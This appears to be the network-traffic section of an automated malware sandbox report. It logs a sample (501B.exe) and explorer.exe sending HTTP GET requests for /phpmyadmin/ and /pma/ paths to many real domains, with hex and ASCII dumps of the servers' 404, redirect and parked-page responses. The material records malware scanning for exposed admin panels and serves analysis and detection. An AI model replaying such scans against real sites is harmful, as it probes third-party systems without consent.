                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                186192.168.2.64974969.160.38.2804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.550092936 CET217OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.709779978 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:37 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                187192.168.2.64980481.31.35.50804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.603231907 CET226OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.797230959 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:37 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                0192.168.2.65146369.160.38.24433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                1192.168.2.651437172.67.204.294433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: khodyari.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC618INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 6b 68 6f 64 79 61 72 69 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sat, 02 Dec 2023 01:09:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closelocation: https://khodyari.com/phpMyAdmin/CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC161INData Raw: 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 9b<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                2192.168.2.65145466.115.173.1884433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:31 UTC616INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 63 63 63 31 64 63 33 61 65 35 39 65 31 65 39 37 61 63 61 61 64 34 30 38 31 36 38 64 63 63 35 37 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeset-cookie: PHPSESSID=ccc1dc3ae59e1e97acaad408168dcc57; path=/; securepragma: no-cachecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-reva


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                3192.168.2.65145566.115.173.1884433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC186OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:31 UTC616INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 32 65 62 39 36 35 33 36 66 32 63 36 65 34 36 38 61 37 62 61 63 63 38 39 34 33 64 31 66 36 63 37 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeset-cookie: PHPSESSID=2eb96536f2c6e468a7bacc8943d1f6c7; path=/; securepragma: no-cachecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-reva


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                4192.168.2.6514613.33.130.1904433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 35 31 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 39 31 66 65 63 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sat, 02 Dec 2023 01:09:25 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Thu, 30 Nov 2023 23:51:08 GMTConnection: closeETag: "65691fec-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                5192.168.2.6514393.64.163.504433492C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC149INData Raw: 48 54 54 50 2f 31 2e 31 20 34 31 30 20 47 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 410 GoneServer: openrestyDate: Sat, 02 Dec 2023 01:09:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC139INData Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='0; url=https://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                6192.168.2.65154369.160.38.2443
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                2023-12-02 01:09:25 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 32 20 44 65 63 20 32 30 32 33 20 30 31 3a 30 39 3a 32 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
